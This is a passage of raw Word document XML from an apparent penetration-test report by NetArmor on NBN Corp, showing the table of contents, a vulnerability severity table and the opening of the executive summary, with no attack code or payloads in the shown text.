                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153834527 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2BE58CE8" w14:textId="1A49C8C1"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28" w:history="1">
            <w:r w:rsidRPr="00165C45">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ASSESSMENT FINDINGS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153834528 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="205B7720" w14:textId="313E3FB9"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29" w:history="1">
            <w:r w:rsidRPr="00165C45">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>5 – Cross Site Scripting</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153834529 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6FF5CE1B" w14:textId="0E6AE089"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30" w:history="1">
            <w:r w:rsidRPr="00165C45">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>6 – Insecure Direct Object References</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153834530 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="43F0C696" w14:textId="5654E08B" w:rsidR="0022617B" w:rsidRDefault="0022617B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153834531" w:history="1">
            <w:r w:rsidRPr="00165C45">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>7 – Directory Listing</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153834531 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="06FF4E2C" w14:textId="420FCC5F"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32" w:history="1">
            <w:r w:rsidRPr="00165C45">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Recommendations</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153834532 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0B66B41F" w14:textId="6C402267"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33" w:history="1">
            <w:r w:rsidRPr="00165C45">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Conclusion</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153834533 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7E18BD55" w14:textId="16E0668D"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34" w:history="1">
            <w:r w:rsidRPr="00165C45">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>APPENDIX A - Ports</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153834534 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>29</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="16246F4D" w14:textId="42FC690A"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35" w:history="1">
            <w:r w:rsidRPr="00165C45">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>APPENDIX B – Scripts</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153834535 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0ECE958C" w14:textId="0FFA4ADF"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36" w:history="1">
            <w:r w:rsidRPr="00165C45">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>APPENDIX C – Flags</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153834536 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="264BD4A8" w14:textId="434AFEFA" w:rsidR="0022617B" w:rsidRDefault="0022617B">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153834537" w:history="1">
            <w:r w:rsidRPr="00165C45">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>APPENDIX D – Resources</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153834537 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="09FFAEB7" w14:textId="4629FEBB" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
          <w:pPr>
            <w:tabs>
              <w:tab w:val="right" w:pos="9360"/>
            </w:tabs>
            <w:spacing w:before="60" w:after="80" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="360"/>
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="30DE597B" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00220DD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D1B8399" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_nfb2d0joh7yb"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="03945C1A" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc153834517"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>EXECUTIVE SUMMARY</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="6D9E0AEA" w14:textId="75F66C43" w:rsidR="00220DD3" w:rsidRPr="00C76750" w:rsidRDefault="681CC5D1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve">NetArmor </w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve">performed a security assessment of the corporate network of NBN Corp on 12/14/2023. </w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve">NetArmor’s </w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve">penetration test simulated an attack from an external threat actor attempting to </w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>gain</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve"> access to systems within the NBN Corp corporate network. The purpose of this assessment was to discover and identify vulnerabilities in NBN Corp’s infrastructure and suggest methods to remediate the vulnerabilities. </w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>NetArmor</w:t>
      </w:r>
      <w:r w:rsidR="02772047" w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve"> tested popular web application vulnerabilities such as SQL injection, Cross Site Scripting, and more. In total,</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="41F515E3" w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerabilities within the scope of the engagement </w:t>
      </w:r>
      <w:r w:rsidR="02772047" w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t>were found and</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve"> are broken down by severity in the table below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6315990F" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00220DD3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pP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2341"/>
        <w:gridCol w:w="2340"/>
        <w:gridCol w:w="2340"/>
        <w:gridCol w:w="2339"/>
      </w:tblGrid>
      <w:tr w:rsidR="00220DD3" w14:paraId="669AFE63" w14:textId="77777777">
        <w:trPr>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980000"/>
          </w:tcPr>
          <w:p w14:paraId="4E9DBD93" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="980000"/>
          </w:tcPr>
          <w:p w14:paraId="147E842D" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F1C232"/>
          </w:tcPr>
          <w:p w14:paraId="54A168AB" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2339" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="38761D"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4F395C69" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>LOW</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00220DD3" w14:paraId="726D4FCA" w14:textId="77777777">
        <w:trPr>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631DF86D" w14:textId="4A03ADC4" w:rsidR="00220DD3" w:rsidRDefault="00CF0EFB">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FD04CFC" w14:textId="1EC12C2F" w:rsidR="00220DD3" w:rsidRDefault="00CF0EFB">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>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45261BCA" w14:textId="7B834D06" w:rsidR="00220DD3" w:rsidRDefault="00CF0EFB">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>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6204EFB8" w14:textId="0584A38E" w:rsidR="00220DD3" w:rsidRDefault="00CF0EFB">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="669AF270" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00220DD3"/>
    <w:p w14:paraId="0F59EE83" w14:textId="1D408AF4" w:rsidR="00890DE9" w:rsidRDefault="00BE4A98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>The penetration test showed that the nbn web server and the nbn client</w:t>
      </w:r>
      <w:r w:rsidR="002916F9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002916F9" w:rsidRPr="00DB4D1D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">did not pass our security benchmarks </w:t>
      </w:r>
      <w:r w:rsidR="00D962D3" w:rsidRPr="00DB4D1D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t>and ha</w:t>
      </w:r>
      <w:r w:rsidR="00883C02">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t>ve</w:t>
      </w:r>
      <w:r w:rsidR="00D962D3" w:rsidRPr="00DB4D1D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t xml:space="preserve"> a high risk score</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB4D1D">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00914447">
        <w:t>Our tests show that i</w:t>
      </w:r>
      <w:r w:rsidR="002916F9">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00914447">
        <w:t xml:space="preserve"> is very easy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="00C76750">
        <w:t xml:space="preserve">gain </w:t>
      </w:r>
      <w:r w:rsidR="002916F9">
        <w:t>complete administrator</w:t>
      </w:r>
      <w:r w:rsidR="00C76750">
        <w:t xml:space="preserve"> control of both the nbn web server as well as the nbn client</w:t>
      </w:r>
      <w:r w:rsidR="00914447">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve"> Further</w:t>
      </w:r>
